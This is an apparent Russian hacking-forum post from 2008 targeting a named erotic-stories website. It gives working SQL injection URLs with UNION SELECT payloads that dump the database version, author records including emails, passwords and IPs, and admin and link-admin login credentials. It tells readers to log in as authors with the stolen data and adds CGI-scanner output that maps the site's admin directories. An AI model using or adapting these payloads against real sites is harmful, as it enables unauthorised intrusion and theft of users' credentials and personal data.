|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850
Репутация:
536
|
|
erostory.ru
http://www.erostory.ru/list.php?g=%CB%E5%F1%E1%E8%FF%ED%EA%E8&link=-1+union+select+1,concat_ws(0x3a,VERSION(),DATABASE (),USER()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8+FROM+erostory_db.autors+LIMIT+0,1--+
Порнуха в текстовом виде xD.
Интересные запросы к интересным таблицам:
http://www.erostory.ru/list.php?g=%CB%E5%F1%E1%E8%FF%ED%EA%E8&link=-1+union+select+1,concat_ws(0x3a,ID,name,email,city ,url,date,pass,status,ip),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18+FROM+erostory_db.autors+LIMIT+0,1--+
Логиниться с этими данными в http://www.erostory.ru/autor.php .
http://www.erostory.ru/list.php?g=%CB%E5%F1%E1%E8%FF%ED%EA%E8&link=5082+u nion+select+1,concat_ws(0x3a,ID,pass),3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18+FROM+erostory_db.admi nip--+
http://www.erostory.ru/list.php?g=%CB%E5%F1%E1%E8%FF%ED%EA%E8&link=5082+u nion+select+1,concat_ws(0x3a,login,pass,status),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+FROM+erosto ry_db.links_admins--+
Как попасть в админку: хз. Просканил CGI-сканером Pelmeshko:
Код:
---------------------------------------------
[i] Starting scan.
[i] Start time: Sat Jun 7 19:49:05 2008
[i] Targer host/path: erostory.ru/
[i] Targer port/SSL: 80 | 0
---------------------------------------------[*] 404 Probe request to server. Server answering with HTTP/1.1 404 Not Found[*] Server Headers:[*] Server: Apache/2[*] Database Cgi's:[*] Rootdir found: erostory.ru/cgi-bin/[*] Database Common:[*] Rootdir found: erostory.ru/[*] [403] Found: erostory.ru/admin/[*] [403] Found: erostory.ru/administration/[*] [403] Found: erostory.ru/admins/[*] [403] Found: erostory.ru/cgi-bin/[*] [302] Found: erostory.ru/config/[*] [403] Found: erostory.ru/error/[*] [403] Found: erostory.ru/images/[*] [403] Found: erostory.ru/img/[*] [403] Found: erostory.ru/picture/[*] [200] Found: erostory.ru/robots.txt[*] [403] Found: erostory.ru/.htaccess[*] [403] Found: erostory.ru/.htpasswd[*] [403] Found: erostory.ru/.htaccess~[*] [403] Found: erostory.ru/.htpasswd~[*] [403] Found: erostory.ru/admin-a/[*] [403] Found: erostory.ru/server-status/
---------------------------------------------[*] Scan finished at Sat Jun 7 19:53:28 2008. Total 817 objects scanned
---------------------------------------------
Куча админок, но все 403 Forbidden. Может админа по IP-адресу определяют, я хз...
|